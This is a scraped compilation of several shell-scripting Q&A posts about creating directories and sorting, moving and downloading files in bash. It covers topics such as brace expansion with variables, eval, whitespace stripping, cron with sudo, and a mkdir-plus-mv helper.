aaaaaa-bbbb-cc10-dddd-L1-202007020137-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020137.ref aaaaaa-bbbb-cc10-dddd-L1-202007020148-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-07.std 
aaaaaa-bbbb-cc10-dddd-L1-202007020148-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020148.ref aaaaaa-bbbb-cc10-dddd-L1-202007020200-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020200.ref aaaaaa-bbbb-cc10-dddd-L1-202007020211-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020211.ref aaaaaa-bbbb-cc10-dddd-L1-202007020223-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020223.ref aaaaaa-bbbb-cc10-dddd-L1-202007020234-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020234.ref aaaaaa-bbbb-cc10-dddd-L1-202007020246-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020246.ref aaaaaa-bbbb-cc10-dddd-L1-202007020257-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020257.refSCRIPT I USED. LOOKING FOR SOMETHING MORE READABLE. Crazy but this script actually works. The first part is to set the home directory. 
# if the input directory has a trailing slash, remove it
if [ ! -z "$1" ]; then
    # remove trailing slash
    basedir=`echo "$1" | sed -e "s/\/$//"`
else
    # copy dirname
    basedir=$1
fi

if [ ! -d "$basedir" ]; then
    echo "Fatal error, argument is not a local directory -- bailing"
    exit 1
fi

#!/bin/bash

#mkdir $sortdir/sort

# $hrdir is the root for the per-hour directories and $stddir holds the raw
# .std/.ref files; both are assumed to be set before this point.
# One directory per day+hour stamp (2020-07-01 11:00 through 2020-07-02 08:00),
# each containing ten elevation sub-directories (01..10) plus a -ref sub-directory.
for hr in 01{11..23} 02{00..08}; do
    mkdir -p "$hrdir/$hr" "$hrdir/$hr/$hr-ref"
    for i in {01..10}; do
        mkdir -p "$hrdir/$hr/$hr-$i"
        # copy the .std files for this hour and elevation
        cp "$stddir"/aaaaaa-bbbb-cc10-dddd-L1-202007"$hr"*-"$i".std "$hrdir/$hr/$hr-$i"
    done
    # copy the reference files for this hour
    cp "$stddir"/aaaaaa-bbbb-cc10-dddd-L1-202007"$hr"*.ref "$hrdir/$hr/$hr-ref"
done
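Since the target directory can be read straight off each file name, a more general sketch (bash; it assumes the fixed ...-L1-202007 prefix and the trailing two-digit elevation index seen in the names above) avoids hard-coding the hour list entirely:

# sort .std files by the day+hour stamp and elevation index parsed from their names
for f in "$stddir"/*.std; do
    base=${f##*/}                          # e.g. aaaaaa-bbbb-cc10-dddd-L1-2020070111xxxx-03.std
    rest=${base#*-L1-202007}               # strip the fixed prefix: 0111xxxx-03.std
    hr=${rest:0:4}                         # day+hour stamp, e.g. 0111
    elev=${base##*-}; elev=${elev%.std}    # trailing elevation index, e.g. 03
    mkdir -p "$hrdir/$hr/$hr-$elev"
    cp "$f" "$hrdir/$hr/$hr-$elev/"
done

# the .ref files only need the day+hour stamp
for f in "$stddir"/*.ref; do
    base=${f##*/}
    rest=${base#*-L1-202007}
    hr=${rest:0:4}
    mkdir -p "$hrdir/$hr/$hr-ref"
    cp "$f" "$hrdir/$hr/$hr-ref/"
done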
Sorting long list of files into multiple subdirectories based on name
Add the script to root's cronjob:

sudo crontab -e

You need to be a sudoer to run the above command. You will also still have to cd to the correct directory inside your script to create your new directory in the right location.
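For example, a root crontab entry along these lines would create the directory every night at 02:00 with no sudo and no password prompt (the schedule here is only a placeholder):

# m h dom mon dow  command -- runs as root, so no sudo is needed
0 2 * * *  mkdir -p /fold1

Using mkdir -p keeps the job from failing on nights when the directory already exists.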
I need to manually create a directory using the following command in a cronjob and not have to enter in a password:

sudo mkdir /fold1/

I have read that I should not edit /etc/sudoers directly. What are my options?
sudo mkdir in bash script without password
One thing I'll do is use echo to strip unwanted whitespace. In this context, it's important to omit any quotes:

LOGDEVICELABEL=FLASHDRIVENAME
MD=$(lsblk -I 8 -o label,uuid -n|sed -e '/^$/ d' -e '/^$LOGDEVICELABEL.*$/ d')
MD=$(echo $MD)   # <-- This line
MDLOGDIR=/media/$LOGDEVICELABEL/Log/$MD
mkdir $MDLOGDIR

The shell invokes the echo command and supplies it with a series of tokens, and echo prints those tokens separated by a single space character. This has the effect of (1) skipping leading and trailing whitespace and (2) converting one or more whitespace characters between tokens to a single space. My use of $(...) instead of back-ticks here is equivalent to the back-tick version; generally I find it easier to read, and it has the nice benefit that it can be nested ($(...$(...))) where the back-tick version cannot.
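As a quick illustration of what that unquoted echo does (the value below is just a made-up example):

MD='   FLASHDRIVENAME    1234-ABCD  '
MD=$(echo $MD)      # word splitting trims the edges and squeezes inner runs of spaces
echo "[$MD]"        # prints [FLASHDRIVENAME 1234-ABCD]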
I am trying to create a folder, named with the label and UUID of a plugged-in media device, on another flash drive which I am using to log. I have the following code:

LOGDEVICELABEL=FLASHDRIVENAME
MD=`lsblk -I 8 -o label,uuid -n|sed -e '/^$/ d' -e '/^$LOGDEVICELABEL.*$/ d'`
MDLOGDIR=/media/$LOGDEVICELABEL/Log/$MD
mkdir $MDLOGDIR

The problem is that the value of the variable $MD has a space at the beginning which I cannot get rid of. That space causes mkdir to treat /media/$LOGDEVICELABEL/Log/ and $MD as two separate arguments. I tried:

MDLOGDIR=`sed 's/ // g' <<</media/$LOGDEVICELABEL/Log/$MD`

which only removes the space between the UUID and the label (which is also necessary) but does not remove the space between /media/$LOGDEVICELABEL/Log/ and $MD.
Can't remove space from beginning of variable
Complex bash + wget solution:

while read -r d f1 f2; do
    mkdir -p "$d" && cd "$d"
    wget --no-verbose -nd -np -r --level=1 "$f1"
    wget --no-verbose -nd -np -r --level=1 "$f2"
    cd $OLDPWD
done <inputfile

Details:

read -r d f1 f2 - read 3 fields from each line of the inputfile into the respective variables d (directory name), f1 (filepath 1) and f2 (filepath 2)
mkdir -p "$d" && cd "$d" - create the new directory if it does not exist and change the current working directory to that folder
wget --no-verbose -nd -np -r --level=1 "$f1" - download all files on the 1st level of the hierarchy (--level=1) from filepath $f1
cd $OLDPWD - back to the previous working directory

Viewing results:

$ tree GSE*
GSE11111
├── filelist.txt
├── GSE11111_RAW.tar
└── GSE11111_series_matrix.txt.gz
GSE55555
├── filelist.txt
├── GSE55555_RAW.tar
├── GSE55555_repset.17402833.enrichment.clusters.gff3.gz
└── GSE55555_series_matrix.txt.gz

0 directories, 7 files
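A slightly shorter sketch of the same loop (same assumptions about the input file) lets wget place the files itself, so there is no need to cd in and out of each directory:

while read -r d f1 f2; do
    mkdir -p "$d"
    # -P/--directory-prefix saves the downloads directly under $d;
    # wget accepts several URLs in one invocation
    wget --no-verbose -nd -np -r --level=1 -P "$d" "$f1" "$f2"
done <inputfile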
I have a file like this with multiple rows:

GSE55555 ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE55nnn/GSE55555/suppl/* ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE55nnn/GSE55555/matrix/*
GSE11111 ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE11nnn/GSE11111/suppl/* ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE11nnn/GSE11111/matrix/*

I want to make a directory using the 1st column and store the files downloaded from the 2nd and 3rd columns in that directory. How can I go about it in Unix?
loop over file and make dir with 1st column and wget using the other columns
Yep, in Bash, brace expansion is done just about first of all, before variables are expanded. Which means that this doesn't work as you want:

$ a=1; b=5; echo {$a..$b}
{1..5}

(The braces are expanded first, giving {$a..$b}, then the variables, giving {1..5}.) But you can do this (if you ever come up with a use for it):

$ aa=123;ab=456; echo $a{a,b}
123 456

Using eval works, since it forces an additional evaluation pass, but it isn't usually a good idea, since it will also evaluate e.g. command substitutions and other expansions coming from filenames containing $ signs, which is usually not what you want. If you have a numeric range, as here, you can use a loop:

S=1; E=3
for (( i=$S; i <= $E; i++ )) ; do
    echo $i
done

or:

while [ $S -le $E ] ; do
    echo $S
    S=$[ $S + 1]
done

Also, zsh does brace expansion as you wanted:

$ zsh -c 'a=1; b=5; echo {$a..$b}'
1 2 3 4 5
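Another common workaround for a numeric range (assuming seq is available, as it is on virtually every Linux system) is command substitution, which is performed before the resulting words are handed to the command:

a=1; b=5
echo $(seq "$a" "$b")    # prints: 1 2 3 4 5

Because the substitution is left unquoted, word splitting turns seq's newline-separated output into separate arguments.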
Ubuntu 14.04.5 LTS, GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)

mkdir -vp test{1..3}/{a,b,c}

works fine:

mkdir: created directory 'test1'
mkdir: created directory 'test1/a'
mkdir: created directory 'test1/b'
mkdir: created directory 'test1/c'
mkdir: created directory 'test2'
mkdir: created directory 'test2/a'
mkdir: created directory 'test2/b'
mkdir: created directory 'test2/c'
mkdir: created directory 'test3'
mkdir: created directory 'test3/a'
mkdir: created directory 'test3/b'
mkdir: created directory 'test3/c'

S=1;E=3; LANG=EN mkdir -pv test{$S..$E}/{a,b,c}

mkdir: created directory 'test{1..3}'
mkdir: created directory 'test{1..3}/a'
mkdir: created directory 'test{1..3}/b'
mkdir: created directory 'test{1..3}/c'

seems not to work. Single and double quoting were unsuccessful as well:

S=1;E=3; LANG=EN mkdir -pv 'test{$S..$E}/{a,b,c}'
mkdir: created directory 'test{$S..$E}'
mkdir: created directory 'test{$S..$E}/{a,b,c}'

S=1;E=3; LANG=EN mkdir -pv 'test{'$S'..'$E'}/{a,b,c}'
mkdir: created directory 'test{1..3}'
mkdir: created directory 'test{1..3}/{a,b,c}'

S=1;E=3; LANG=EN mkdir -pv "test{S1..S3}/{a,b,c}"
mkdir: created directory 'test{S1..S3}'
mkdir: created directory 'test{S1..S3}/{a,b,c}'

I know I can use for loops, which have limits with the number of arguments and possible issues with folders, or use printf or similar setups as shown in the "Similar Questions" part. However, I would rather like to know why this specific case of expansion fails for me.

I found a possible solution in a comment on this question, Bash script single-quotes parameter with globbing value, quoting the user galaxy:

You can use eval to expand the whole line before executing it, e.g. $out=(eval "grep ..."), however, this works only if your input is trusted. –

which makes this

S=1;E=3; LANG=EN eval mkdir -pv "test{$S..$E}/{a,b,c}"

mkdir: created directory 'test1'
mkdir: created directory 'test1/a'
mkdir: created directory 'test1/b'
mkdir: created directory 'test1/c'
mkdir: created directory 'test2'
mkdir: created directory 'test2/a'
mkdir: created directory 'test2/b'
mkdir: created directory 'test2/c'
mkdir: created directory 'test3'
mkdir: created directory 'test3/a'
mkdir: created directory 'test3/b'
mkdir: created directory 'test3/c'

work.
mkdir with brace expansion seems to fail when variables are used [duplicate]
You will need eval for this.

#!/bin/bash

start=1
stop=$1

mkdir $(eval echo ex_{$start..$stop})

But I agree with don_crissti, why not simply use a loop?

Before:

ls -p | grep 'ex_'
<empty>

After I run the script:

./makeDirs.sh 3
ls -p | grep 'ex_'
ex_1/ ex_2/ ex_3/

Further reading:

Why is eval bad?
Variables in bash seq replacement ({1..10})
How do I make multiple directories at once in a directory?
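Assuming GNU seq is available, the directories can also be created without eval, and with the zero-padded names shown in the question:

#!/bin/bash
start=1
stop=$1
# seq -f applies a printf-style format to each number; %02g zero-pads to two digits (GNU seq)
mkdir $(seq -f 'ex_%02g' "$start" "$stop")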
I'm trying to make a bash script that creates a series of directories, taking a parameter for how many directories should be created.

$> ./createDir.sh 5
$> ls
ex_01 ex_02 ex_03 ex_04 ex_05

I tried using mkdir ex_{01..$1} but it does not seem correct. How could I make this work (without using any loop)?
Creating multiple directories using a parameter in a shell script [duplicate]
Change into the /Volumes/Server1/Craft/2OQ/Dom_Curr/EN directory:

cd /Volumes/Server1/Craft/2OQ/Dom_Curr/EN

Then run the following:

for D in CT_*
do
    mkdir -p ${D}/5Misc/Permissions
done

This will add the subdirectories to every directory in the EN directory that begins with CT_.
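If the numbering really is a contiguous CT_1 through CT_124, as the question suggests, a single bash command can do the same thing; this is only a sketch and assumes there are no gaps in the range:

mkdir -p /Volumes/Server1/Craft/2OQ/Dom_Curr/EN/CT_{1..124}/5Misc/Permissions

Note that -p will silently create any CT_ directory missing from the range, so the loop over CT_* is the safer choice if the numbering has holes.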
I have a directory containing several folders with different names, and I need to create a subdirectory in each individual folder. The path for one of the folders looks like this:

/Volumes/Server1/Craft/2OQ/Dom_Curr/EN/CT_1

There are multiple CT_xyz (CT_1 through CT_124) folders in the EN directory, and I need to put a subdirectory in each CT folder like this:

/Volumes/Server1/Craft/2OQ/Dom_Curr/EN/CT_1/5Misc/Permissions

The 5Misc/Permissions folders need to go in each individual folder.
Create a subdirectory within multiple directories
You can write a tiny script to do that for you, along these lines (adjust as needed, I'm not sure I got the story right):

> cat tst.sh
#!/bin/bash
for river in amazon niger rhine ; do
    for name in gfdl hadgem ipsl ; do
        for count in 1 2 3 4 ; do
            mkdir ${river}/${name}/${count}
            cp -a ${river}/${name}/${river}_${name} ${river}/${name}/${count}
            mv ${river}/${name}/${river}_${name}${count} ${river}/${name}/${count}
        done
    done
done

Before running it:

> find . | sort
.
./amazon
./amazon/gfdl
./amazon/gfdl/amazon_gfdl
./amazon/gfdl/amazon_gfdl1
./amazon/gfdl/amazon_gfdl2
./amazon/gfdl/amazon_gfdl3
./amazon/gfdl/amazon_gfdl4
./amazon/gfdl/amazon_gfdl5
...

Result:

> chmod u+x tst.sh
> ./tst.sh
> find . | sort
.
./amazon
./amazon/gfdl
./amazon/gfdl/1
./amazon/gfdl/1/amazon_gfdl
./amazon/gfdl/1/amazon_gfdl1
./amazon/gfdl/2
./amazon/gfdl/2/amazon_gfdl
./amazon/gfdl/2/amazon_gfdl2
./amazon/gfdl/3
./amazon/gfdl/3/amazon_gfdl
./amazon/gfdl/3/amazon_gfdl3
./amazon/gfdl/4
./amazon/gfdl/4/amazon_gfdl
./amazon/gfdl/4/amazon_gfdl4
./amazon/gfdl/amazon_gfdl
./amazon/gfdl/amazon_gfdl5
...
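If there are too many rivers and model names to list by hand, the same loops could instead be driven by the directories that already exist; this is only a sketch and assumes the two-level river/model layout described in the question, run from the directory that contains the river folders:

#!/bin/bash
# walk every river/model directory instead of hard-coding the names
for riverdir in */ ; do
    river=${riverdir%/}
    for namedir in "$riverdir"*/ ; do
        name=$(basename "$namedir")
        for count in 1 2 3 4 ; do
            mkdir -p "$namedir$count"
            cp -a "$namedir${river}_${name}" "$namedir$count"
            mv "$namedir${river}_${name}${count}" "$namedir$count"
        done
    done
done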
I have several folders ("amazon", "niger", "rhine",...). Inside each of them I have several subfolders ("gfdl", "hadgem", "ipsl",...). Each subfolders is composed by 5 subfolders (e.g. in "amazon", the subfolder "gfdl" is composed by 5 subfolder 'amazon_gfdl', 'amazon_gfdl1', ..., 'amazon_gfdl5'); and the others subfolders follow the same structure (e.g. in "amazon" subfolder "ipsl" is composed by 5 subfolders 'amazon_ipsl', 'amazon_ipsl1', 'amazon_ipsl2',...until 'amazon_ipsl5'. I have a huge amount of folder following the same frame of organisation. Therefore my question is the following: How can I organise each folder and subfolder in such a way that in each subfolder ("gfdl", "hadgem","ipsl",...), 4 new directories are created ("1", "2", "3", "4"); and then that the folder e.g. "amazon_gfdl" (already present in "gfdl") is copied in each of those new directories and finally that "amazon_gfdl1" is moved to the new directory "1", "amazon_gfdl2" is moved to the new directory "2", and so on! I am currently using the command cp and move within each subfolders but it´s not really efficient and I might need an extra life to end this task like that! Therefor any helps or hint will be greatly appreciated. Thanks you very much!
Folder organization
Your attempt in the question is a fair stab. Here's how I would consider approaching it:

#!/bin/sh
src=$1
dst=$2

if [ ! -d "$dst" ]
then
    dir=${dst%/*}                   # dir path
    [ "$dir" = "$dst" ] && dir=.    # but had no dir
    mkdir -p "$dir"                 # create path
fi
mv "$src" "$dst"                    # move file

Save this as your mvdir somewhere in your $PATH, and make it executable. It would be possible to extend this script to handle multiple sources, but I haven't done that here.
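A shorter variant of the same idea (just a sketch; it relies on dirname printing "." when the destination has no directory part) would be:

#!/bin/sh
# mvdir SRC DST -- create DST's parent directory if needed, then move SRC there
mkdir -p "$(dirname -- "$2")" && mv -- "$1" "$2"

Either version is invoked exactly as in the question:

mvdir /home/user/Documents/irs.pdf /mnt/work/45/223/insight/irs1970.pdf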
I know it's a classic, but I didn't find the exact situation that concerns me. I need a mkdir+mv command that can be invoked like this:

mvdir /home/user/Documents/irs.pdf /mnt/work/45/223/insight/irs1970.pdf

It should work exactly like a normal mv command, just creating the path instead of failing with "no such file or directory", considering that work/45/223/insight/ doesn't exist and needs to be created. All the other commands I've found can't be invoked like that: they need more information, require me to split the path and file name myself, or something similar.

Attempt:

mkdir -p /mnt/work/45/223/insight && mv /home/user/Documents/irs.pdf /mnt/work/45/223/insight/irs1970.pdf
move and make directory